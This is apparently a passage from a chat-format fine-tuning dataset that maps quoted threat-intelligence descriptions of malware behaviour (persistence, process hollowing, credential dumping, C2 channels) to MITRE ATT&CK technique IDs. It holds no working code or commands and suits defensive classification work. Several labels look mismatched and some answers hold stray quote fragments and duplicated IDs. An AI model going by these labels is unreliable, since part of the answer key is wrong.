- "content": "Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the event this is successful the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\\services\\ In the event it is not successful, this alternative path will be used instead: %APPDATA%\\microsoft\\mmc\\ It proceeds to load and decrypt and embedded bitmap resource file"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is used to schedule tasks on a Windows system to run at a specific date and time."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the newer attack flows we observed, we once again found valid Certum certificates were used to sign the Bandook malware executable"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax can download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used scheduled tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation. Three known vulnerabilities are targeted"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file is saved to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe 00 00 04 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad2.exe 00 00 05 The files notepad1.exe and notepad2.exe are concatenated together and written to C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe and executed 00 00 06 The contents of the following file is sent to the server: C:\\Users\\[Username]\\AppData\\Local\\Temp\\note.txt 00 00 07 The string following the command ID is executed using \"cmd /C\" and results are sent to server Links to APT3 On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1036 - Masquerading', 'T1087 - Account Discovery', 'T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "accessed email accounts using Outlook Web Access."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson has the ability to delete files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product. SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code. Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This IP also belongs to the same service provider and class B network range as another IP we had associated with DarkHydrus, 107.175.150[.]113 which specifically resolved to a domain name containing a victim organization’s name"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used malware such as Azorult and Cobalt Strike in their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy may obfuscate portions of the initial C2 handshake."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate over FTP and send email over SMTP."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It will then jump to code that decrypts the Lokibot executable using decryption keys from the configuration structure. The first two layers are decrypted using `DecryptionKeyA` and `DecryptionKeyB`, and reverses all the data. After that, the final layer is decrypted using the same decryption method used to decrypt resource data at the start of the third stage.The DLL contains multiple ways to execute a PE file. The shellcode will create a suspended process using the third parameter as a command line command and injects Lokibot into it using process hollowing"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It’s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SysUpdate has the ability to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker’s own. This technique is not new; it has been used by other malware in the past – even the infamous BackSwap banking trojan implemented it in its earliest stages"
- },
- {
- "role": "assistant",
- "content": "T1565.002 - Transmitted Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There does appear to be function names however, including PeekMessageA, which has been previously observed in other keylogging malware"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "command and control occurs via HTTPS over port 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port', 'T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has used VBScript in its operations."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs the command net user on a victim. also runs tests to determine the privilege level of the compromised user."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses RC4 and Base64 to obfuscate strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Key points PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus softwar"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET uses \"ps aux\" with the \"grep\" command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has used DNS requests over UDP port 53 for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography', 'T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The source code of SUNBURST was likely sanitized before being included in SUNSPOT. The use of generic variable names, pre-obfuscated strings, and the lack of developer comments or disabled code is similar to what could be obtained after decompiling a backdoored Orion binary, as illustrated in Figure 2, which provides a comparison between the injected source code (top) and a decompilation output (bottom"
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali can download payloads from remote C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MSGET downloader uses a dead drop resolver to access malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can query the Registry for installed applications."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mitigation As this sample installs itself through the use of EternalBlue, the targeted protocol is SMB. Because of this, in order to best mitigate and avoid possible installations, you need your system updated to the latest security patches. Specifically, you’d want to make sure that you have MS17-010 installed, as this is the security patch that patches the EternalBlue vulnerability"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "was likely obfuscated using Invoke-Obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the “feast” parameter as its export function. Once ServHelper is executed, it runs a PowerShell script to get information from the infected machine"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon has used various API calls."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used a Python tool named Bewmac to record the webcam on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has staged collected data in a central upload directory prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has compromised legitimate web browser updates to deliver a backdoor."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth encrypts data sent to its C2 server over HTTP with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "achieves persistence by creating a Registry entry in HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques."
- },
- {
- "role": "assistant",
- "content": "T1127 - Trusted Developer Utilities Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SOUNDBITE is capable of gathering system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\""
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny is a multi-threaded bot with an integrated scripting engine. It incorporates a Lua engine and downloads and executes Lua scripts to reach a certain level of polymorphism. The Lua scripts can call back into the C++ code to alter the malware behavior at runtime"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Downloading stylesheets allows for emended JavaScript and VBS to be run from within them, at which point any type of malware could be staged and run quite easily"
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic gathers information on local group names."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 malware has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has retrieved DLLs and installer binaries for malware execution from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron is capable of starting a process using CreateProcess."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used Mimikatz to retrieve credentials from LSASS memory."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the command-line interface for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to side load DLLs with a valid version of Chrome with one of their tools."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY WMI Component The WMI component of the POSHSPY backdoor leverages a Filter to execute the PowerShell component of the backdoor on a regular basis"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher establishes persistence by creating the Registry key \"HKCU\\Software\\Microsoft\\Windows\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mofang delivered spearphishing emails with malicious links included."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used steganography to hide shellcode in a BMP image file."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has the ability to search for files on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the dropper checks its own parent process for indications that it is running in a sandbox setup. It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe uses HTTP for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa named a shellcode loader binary \"svchast.exe\" to spoof the legitimate \"svchost.exe\"."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Its sole purpose is to load setup.dll using LoadLibraryA. If not, it will attempt to obtain such privileges using token impersonation if the version of Windows is below Windows 7 build 7601; otherwise it will attempt different UAC bypass techniques, allowing installation of the payload loader into one of"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Karkaddan actors are known to use the Crimson RAT malware in its campaigns to communicate with its command-and-control (C&C) server to download other malware or exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1587.001 - Malware', 'T1583.004 - Server"
- }
- ]
